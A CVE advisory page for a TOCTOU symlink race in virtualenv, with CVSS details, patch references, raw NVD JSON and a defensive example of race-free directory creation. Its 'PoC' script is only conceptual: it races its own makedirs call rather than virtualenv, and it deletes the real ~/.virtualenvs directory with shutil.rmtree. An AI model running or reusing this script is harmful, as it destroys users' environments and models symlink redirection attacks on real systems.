Security Vulnerability Report
CVE-2026-22702 CVSS 4.5 MEDIUM

CVE-2026-22702

Published: 2026-01-10 07:16:03
Last Modified: 2026-02-18 17:43:08

Description

virtualenv is a tool for creating isolated virtual python environments. Prior to version 20.36.1, TOCTOU (Time-of-Check-Time-of-Use) vulnerabilities in virtualenv allow local attackers to perform symlink-based attacks on directory creation operations. An attacker with local access can exploit a race condition between directory existence checks and creation to redirect virtualenv's app_data and lock file operations to attacker-controlled locations. This issue has been patched in version 20.36.1.

CVSS Details

CVSS Score: 4.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:virtualenv:virtualenv:*:*:*:*:*:*:*:* - VULNERABLE
virtualenv < 20.36.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2026-22702 PoC - virtualenv TOCTOU symlink attack
Note: This is a conceptual PoC for educational and security research purposes only.
"""
import os
import time
import threading
import subprocess
import tempfile
import shutil


def toctou_attack():
    """
    Demonstrates TOCTOU vulnerability in virtualenv directory creation.
    Attack window exists between existence check and directory creation.
    """
    target_dir = os.path.expanduser("~/.virtualenvs")
    malicious_dir = tempfile.mkdtemp(prefix="malicious_")
    print(f"[*] Target directory: {target_dir}")
    print(f"[*] Malicious redirect: {malicious_dir}")

    # Race condition window - create symlink during check->create gap
    def create_symlink_race():
        time.sleep(0.001)  # Small delay to hit the race window
        if os.path.exists(target_dir):
            shutil.rmtree(target_dir)
        os.symlink(malicious_dir, target_dir)
        print(f"[+] Symlink created: {target_dir} -> {malicious_dir}")

    race_thread = threading.Thread(target=create_symlink_race)
    race_thread.start()

    # Trigger virtualenv directory creation (vulnerable code path)
    # In real attack, this would trigger virtualenv's internal operations
    try:
        os.makedirs(target_dir, exist_ok=True)
    except:
        pass
    race_thread.join()

    # Verify if symlink attack succeeded
    if os.path.islink(target_dir):
        print(f"[!] Attack successful - virtualenv would write to: {os.readlink(target_dir)}")
        return True
    return False


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2026-22702 - virtualenv TOCTOU Symlink Attack PoC")
    print("=" * 60)
    toctou_attack()
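The defensive side of the check-then-create gap described above, as an added example that is not virtualenv's code or its actual patch: a check-then-create helper next to one that creates atomically and then verifies the result without following symlinks. The function names and the `app_data` path inside a temporary directory are constructed for illustration.

```python
import os
import stat
import tempfile


def racy_ensure_dir(path):
    """Check-then-create: the gap between exists() and makedirs() is the race window."""
    if not os.path.exists(path):          # time of check (follows symlinks)
        os.makedirs(path, exist_ok=True)  # time of use; accepts whatever is there by now
    return path


def safe_ensure_dir(path, mode=0o700):
    """Create atomically, then verify what is at `path` without following links."""
    try:
        os.mkdir(path, mode)              # atomic: fails if anything, even a symlink, exists
    except FileExistsError:
        pass
    st = os.lstat(path)                   # lstat inspects the entry itself, not its target
    if stat.S_ISLNK(st.st_mode):
        raise PermissionError(f"{path} is a symlink, refusing to use it")
    if not stat.S_ISDIR(st.st_mode):
        raise NotADirectoryError(path)
    if hasattr(os, "getuid") and st.st_uid != os.getuid():
        raise PermissionError(f"{path} is owned by uid {st.st_uid}")
    return path


def demo():
    """Constructed scenario: a symlink already sits where the tool wants its directory."""
    with tempfile.TemporaryDirectory() as base:
        elsewhere = os.path.join(base, "attacker_controlled")
        os.mkdir(elsewhere)
        app_data = os.path.join(base, "app_data")   # hypothetical path, not virtualenv's
        os.symlink(elsewhere, app_data)   # stands in for a link planted in the race window
        racy_accepted = racy_ensure_dir(app_data) == app_data  # redirect goes unnoticed
        try:
            safe_ensure_dir(app_data)
            safe_rejected = False
        except PermissionError:
            safe_rejected = True
        fresh = safe_ensure_dir(os.path.join(base, "fresh"))
        return racy_accepted, safe_rejected, os.path.isdir(fresh)


if __name__ == "__main__":
    print(demo())
```

The verification is only as strong as the parent directory's permissions: where other users can rename or delete entries in the parent, open the directory with `os.open(path, os.O_DIRECTORY | os.O_NOFOLLOW)` and operate relative to that descriptor instead of the path.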

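References

https://github.com/pypa/virtualenv/commit/dec4cec5d16edaf83a00a658f32d1e032661cebc (Patch)
https://github.com/pypa/virtualenv/pull/3013 (Issue Tracking, Patch)
https://github.com/pypa/virtualenv/security/advisories/GHSA-597g-3phw-6986 (Mitigation, Patch, Vendor Advisory)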

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22702", "sourceIdentifier": "[email protected]", "published": "2026-01-10T07:16:02.857", "lastModified": "2026-02-18T17:43:08.147", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "virtualenv is a tool for creating isolated virtual python environments. Prior to version 20.36.1, TOCTOU (Time-of-Check-Time-of-Use) vulnerabilities in virtualenv allow local attackers to perform symlink-based attacks on directory creation operations. An attacker with local access can exploit a race condition between directory existence checks and creation to redirect virtualenv's app_data and lock file operations to attacker-controlled locations. This issue has been patched in version 20.36.1."}, {"lang": "es", "value": "virtualenv es una herramienta para crear entornos virtuales de Python aislados. Antes de la versión 20.36.1, las vulnerabilidades TOCTOU (Time-of-Check-Time-of-Use) en virtualenv permiten a atacantes locales realizar ataques basados en enlaces simbólicos en operaciones de creación de directorios. Un atacante con acceso local puede explotar una condición de carrera entre las comprobaciones de existencia de directorios y su creación para redirigir las operaciones de los archivos app_data y de bloqueo de virtualenv a ubicaciones controladas por el atacante. Este problema ha sido parcheado en la versión 20.36.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.0, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-59"}, {"lang": "en", "value": "CWE-362"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:virtualenv:virtualenv:*:*:*:*:*:*:*:*", "versionEndExcluding": "20.36.1", "matchCriteriaId": "1339346E-BA67-4C3F-8792-7F1829C91FA2"}]}]}], "references": [{"url": "https://github.com/pypa/virtualenv/commit/dec4cec5d16edaf83a00a658f32d1e032661cebc", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/pypa/virtualenv/pull/3013", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/pypa/virtualenv/security/advisories/GHSA-597g-3phw-6986", "source": "[email protected]", "tags": ["Mitigation", "Patch", "Vendor Advisory"]}]}}